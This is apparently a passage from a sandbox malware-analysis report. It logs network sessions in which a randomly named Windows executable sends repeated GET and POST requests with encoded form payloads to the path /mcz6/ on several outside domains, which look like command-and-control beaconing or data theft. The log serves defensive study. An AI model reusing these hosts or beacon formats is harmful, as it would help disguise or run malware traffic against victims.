                                                    24192.168.2.949738162.0.237.22801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:20:33.776360035 CEST473OUTGET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=Z7d5vO3PiPWE/zeG4Btin5s4Ysi+TbPypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08UqI4ilaLC+vP+XuzsWsJjJ3qBfbOqHA== HTTP/1.1
                                                    Host: www.deaybrid.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:20:34.576129913 CEST548INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:20:34 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.949739103.168.172.37801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:04.300153971 CEST750OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.celebration24.co.uk
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.celebration24.co.uk
                                                    Referer: http://www.celebration24.co.uk/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 63 75 62 72 52 34 76 64 4f 32 66 61 38 4e 62 4b 4e 47 59 73 70 6d 42 7a 6b 50 72 64 44 59 38 68 62 45 30 48 56 68 5a 37 53 30 5a 4e 43 6d 78 6e 2f 4c 34 48 34 55 35 69 37 76 37 64 6b 51 4e 35 76 71 6f 56 77 4a 2b 56 6f 47 52 54 66 73 77 57 7a 79 30 79 4a 7a 61 58 48 37 7a 4e 57 58 6f 7a 36 2b 31 73 63 32 75 6e 6c 54 42 52 33 45 2b 72 7a 61 6e 71 6c 32 6d 56 50 67 41 61 49 64 47 34 50 68 72 58 41 4c 31 33 6d 6e 78 35 56 2b 6d 41 52 76 76 42 50 67 67 73 68 4d 39 64 36 77 6d 43 4a 67 72 67 37 39 61 46 33 73 4f 33 35 52 70 43
                                                    Data Ascii: 1Joh=bOU4KtZ1M2hWcubrR4vdO2fa8NbKNGYspmBzkPrdDY8hbE0HVhZ7S0ZNCmxn/L4H4U5i7v7dkQN5vqoVwJ+VoGRTfswWzy0yJzaXH7zNWXoz6+1sc2unlTBR3E+rzanql2mVPgAaIdG4PhrXAL13mnx5V+mARvvBPggshM9d6wmCJgrg79aF3sO35RpC
                                                    May 16, 2024 17:21:05.327138901 CEST570INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 16 May 2024 15:21:05 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-backend: web4
                                                    X-Frontend: frontend1
                                                    X-Trace-Id: ti_159389ade035d0ad7fc69ce6881f36b4
                                                    Content-Encoding: br
                                                    Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.949740103.168.172.37801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:06.836740017 CEST774OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.celebration24.co.uk
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.celebration24.co.uk
                                                    Referer: http://www.celebration24.co.uk/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 66 4e 54 72 54 62 48 64 5a 6d 65 6f 35 4e 62 4b 61 57 59 6f 70 6d 64 7a 6b 4b 4c 4e 57 37 49 68 59 67 77 48 55 67 5a 37 52 30 5a 4e 4e 47 78 69 37 4c 34 4d 34 55 45 56 37 75 48 64 6b 51 5a 35 76 72 59 56 78 36 47 53 75 57 52 52 54 4d 77 59 39 53 30 79 4a 7a 61 58 48 37 6d 6f 57 58 67 7a 36 75 46 73 4f 55 47 6b 6d 54 42 57 6a 55 2b 72 33 61 6e 75 6c 32 6d 33 50 6a 45 38 49 62 43 34 50 68 62 58 4f 36 31 34 76 6e 78 37 4b 75 6e 38 63 75 76 46 55 41 70 77 38 75 74 64 6a 6d 71 2f 4b 42 4c 2b 71 50 54 65 69 37 4f 51 2b 32 67 71 6d 66 35 4b 43 4c 53 2f 4f 6c 71 72 61 68 49 4e 6b 51 73 74 33 41 3d 3d
                                                    Data Ascii: 1Joh=bOU4KtZ1M2hWfNTrTbHdZmeo5NbKaWYopmdzkKLNW7IhYgwHUgZ7R0ZNNGxi7L4M4UEV7uHdkQZ5vrYVx6GSuWRRTMwY9S0yJzaXH7moWXgz6uFsOUGkmTBWjU+r3anul2m3PjE8IbC4PhbXO614vnx7Kun8cuvFUApw8utdjmq/KBL+qPTei7OQ+2gqmf5KCLS/OlqrahINkQst3A==
                                                    May 16, 2024 17:21:07.658236027 CEST570INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 16 May 2024 15:21:07 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-backend: web4
                                                    X-Frontend: frontend1
                                                    X-Trace-Id: ti_c73188c602a93f2d446cefd441e22c7b
                                                    Content-Encoding: br
                                                    Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.949741103.168.172.37801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:09.369940042 CEST1787OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.celebration24.co.uk
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.celebration24.co.uk
                                                    Referer: http://www.celebration24.co.uk/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 66 4e 54 72 54 62 48 64 5a 6d 65 6f 35 4e 62 4b 61 57 59 6f 70 6d 64 7a 6b 4b 4c 4e 57 36 77 68 62 54 34 48 56 44 42 37 51 30 5a 4e 45 6d 78 6a 37 4c 34 64 34 55 63 52 37 75 4b 6d 6b 53 68 35 76 4e 45 56 32 4c 47 53 6e 57 52 52 62 73 77 5a 7a 79 30 6e 4a 7a 71 62 48 37 32 6f 57 58 67 7a 36 73 4e 73 59 32 75 6b 67 54 42 52 33 45 2b 64 7a 61 6e 43 6c 32 76 41 50 67 6f 4b 49 49 4b 34 50 46 33 58 43 6f 64 34 6b 6e 78 39 4c 75 6e 6b 63 72 32 62 55 41 6b 4a 38 76 5a 33 6a 68 47 2f 41 47 79 67 76 75 62 30 35 72 4c 6e 33 55 55 78 76 35 39 72 44 59 76 77 52 56 6d 49 44 67 4a 53 6e 52 35 5a 72 6c 54 30 76 43 68 42 62 62 59 4a 65 34 78 43 72 6a 6e 31 48 51 73 47 71 2f 39 53 47 63 35 34 54 6c 53 37 4e 56 36 6e 33 4c 62 72 44 69 77 62 6f 32 57 48 35 4d 69 55 77 33 43 31 6f 70 69 74 33 70 6c 4d 52 78 47 35 58 63 50 72 74 55 6d 45 72 65 4c 45 2f 47 4b 54 64 31 7a 34 42 70 65 44 34 43 63 5a 61 34 44 69 71 6c 53 78 47 4d 37 32 56 76 37 49 34 64 54 5a 58 37 49 35 79 [TRUNCATED]
                                                    Data Ascii: 1Joh=bOU4KtZ1M2hWfNTrTbHdZmeo5NbKaWYopmdzkKLNW6whbT4HVDB7Q0ZNEmxj7L4d4UcR7uKmkSh5vNEV2LGSnWRRbswZzy0nJzqbH72oWXgz6sNsY2ukgTBR3E+dzanCl2vAPgoKIIK4PF3XCod4knx9Lunkcr2bUAkJ8vZ3jhG/AGygvub05rLn3UUxv59rDYvwRVmIDgJSnR5ZrlT0vChBbbYJe4xCrjn1HQsGq/9SGc54TlS7NV6n3LbrDiwbo2WH5MiUw3C1opit3plMRxG5XcPrtUmEreLE/GKTd1z4BpeD4CcZa4DiqlSxGM72Vv7I4dTZX7I5ye5FqS5igM8anF86lonQFMayTYEIql7fxacja9o9eCWrqzpArSV1h30h478EGWcgesRHLOsWqYqEnoQ0wXnn0b73TTbqAkzYiJ0AhMm7dhTh02ZeMvdyEHjwEcNnWhKM/orzFPJrDWQSPl7lW4yKKd+9Tw6t9oQ61rmNktx0Eow9s7GEh1b/3O/AVsGAxyfOocaTZi68n1Bzbp80mpqHkiknCKETqFQcf7dlbUxgN5k4kdGL2A8MiOofPpkt7y1CBuPgwSMwGjPl6SjfQLGuV74exoZTMdG8TO1PZgE0gu5MltKPNoYOxN8PCVAMrO455KrE9TjpHUJWT+3YUZYAEvz4vnido8mFkmiNMQncbx+ClbVICpPmAoHYP+qK1WDXvnYF88cwZR2JC+UeUJwhHqgT8SoQU0HgSnbFe+UwDCXJgw1rTDP+cKwXMoHiekT3xkKuMQ7H+bZtJlkcrIrHOJBXwRuQrB/iH40bgQExZahuD8fBVpYyrHPBu4FX38cQDyesRq8KrksCc5NdqcvMLUHYaYY27Xm62kAPi0Qp6uCKMIuFF/FOslpsbETCeflRLLO5a/rogv9D/fxtnDoVl+MOaur5CVlMa+QHgS0dXfzv8en6q/ObM/+vHERM4sRNrZwc5O4/y+eHXheSuo2Oy18NqvKrPT+3gnV [TRUNCATED]
                                                    May 16, 2024 17:21:10.088704109 CEST570INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 16 May 2024 15:21:09 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-backend: web4
                                                    X-Frontend: frontend1
                                                    X-Trace-Id: ti_58458f13e6035bc12306a06a351c87b4
                                                    Content-Encoding: br
                                                    Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.949742103.168.172.37801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:12.951994896 CEST479OUTGET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=WM8YJa5qA0NkIP/QQImrOwC+xPjRZGMWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WNvDgoePcC7Qc9BGKrDLvXVkg0rvhMMA== HTTP/1.1
                                                    Host: www.celebration24.co.uk
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:21:14.693639040 CEST796INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 16 May 2024 15:21:14 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Content-Length: 544
                                                    Connection: close
                                                    x-backend: web4
                                                    X-Frontend: frontend1
                                                    X-Trace-Id: ti_90d904d2c1f6786a7c2c3ed3ae7772dd
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.949743104.37.39.71801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:20.106504917 CEST750OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.gledingakademiet.no
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.gledingakademiet.no
                                                    Referer: http://www.gledingakademiet.no/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 39 51 45 69 31 64 7a 7a 54 42 71 56 4a 34 6f 5a 64 56 76 4a 73 62 42 55 64 7a 52 39 6a 4c 47 6c 42 50 64 73 48 6c 4b 51 43 5a 5a 39 43 6b 5a 74 41 41 57 36 69 44 75 6f 49 43 73 55 42 49 68 37 51 79 48 49 30 58 51 76 64 37 30 6b 45 37 72 6b 4f 4f 76 48 73 6e 41 4a 6f 62 74 38 46 2b 72 78 78 33 52 5a 35 54 66 6b 4e 79 68 73 4d 68 4b 4f 4a 69 6e 68 32 34 6b 4f 68 73 72 4e 5a 50 6d 53 61 33 38 35 7a 74 30 33 6a 63 76 74 4f 51 4f 75 34 33 6a 6c 54 31 73 46 36 76 31 66 47 44 39 55 63 54 7a 78 33 6b 4b 68 5a 57 73 45 34 45 35 68
                                                    Data Ascii: 1Joh=CDSZib7hojvV9QEi1dzzTBqVJ4oZdVvJsbBUdzR9jLGlBPdsHlKQCZZ9CkZtAAW6iDuoICsUBIh7QyHI0XQvd70kE7rkOOvHsnAJobt8F+rxx3RZ5TfkNyhsMhKOJinh24kOhsrNZPmSa385zt03jcvtOQOu43jlT1sF6v1fGD9UcTzx3kKhZWsE4E5h
                                                    May 16, 2024 17:21:20.928128958 CEST161INHTTP/1.1 404 Not Found
                                                    Content-Length: 18
                                                    Content-Type: text/plain
                                                    Date: Thu, 16 May 2024 15:21:20 GMT
                                                    Server: Caddy
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                    Data Ascii: 404 page not found


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.949744104.37.39.71801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:22.633918047 CEST774OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.gledingakademiet.no
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.gledingakademiet.no
                                                    Referer: http://www.gledingakademiet.no/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 38 7a 63 69 79 2b 62 7a 55 68 71 57 56 6f 6f 5a 49 46 76 4e 73 62 4e 55 64 78 38 77 67 35 53 6c 41 72 52 73 45 6e 75 51 42 5a 5a 39 58 55 5a 6b 45 41 57 78 69 44 71 67 49 41 6f 55 42 49 46 37 51 77 50 49 30 6b 49 67 63 72 30 6d 4c 62 72 71 44 75 76 48 73 6e 41 4a 6f 62 35 47 46 2b 44 78 78 45 5a 5a 36 79 66 6e 52 69 68 76 4c 68 4b 4f 61 79 6e 74 32 34 6c 62 68 74 6e 6e 5a 4d 65 53 61 79 41 35 79 2f 63 77 34 4d 76 6e 41 77 50 38 30 58 53 66 57 47 59 34 36 73 31 61 47 69 46 51 62 79 54 76 6d 57 44 36 4d 42 73 6a 2f 6a 77 4a 54 38 31 65 44 68 4b 62 4c 47 48 69 2f 56 6c 68 68 4b 6e 57 6e 51 3d 3d
                                                    Data Ascii: 1Joh=CDSZib7hojvV8zciy+bzUhqWVooZIFvNsbNUdx8wg5SlArRsEnuQBZZ9XUZkEAWxiDqgIAoUBIF7QwPI0kIgcr0mLbrqDuvHsnAJob5GF+DxxEZZ6yfnRihvLhKOaynt24lbhtnnZMeSayA5y/cw4MvnAwP80XSfWGY46s1aGiFQbyTvmWD6MBsj/jwJT81eDhKbLGHi/VlhhKnWnQ==
                                                    May 16, 2024 17:21:23.629556894 CEST161INHTTP/1.1 404 Not Found
                                                    Content-Length: 18
                                                    Content-Type: text/plain
                                                    Date: Thu, 16 May 2024 15:21:23 GMT
                                                    Server: Caddy
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                    Data Ascii: 404 page not found


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.949745104.37.39.71801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:25.166233063 CEST1787OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.gledingakademiet.no
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.gledingakademiet.no
                                                    Referer: http://www.gledingakademiet.no/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
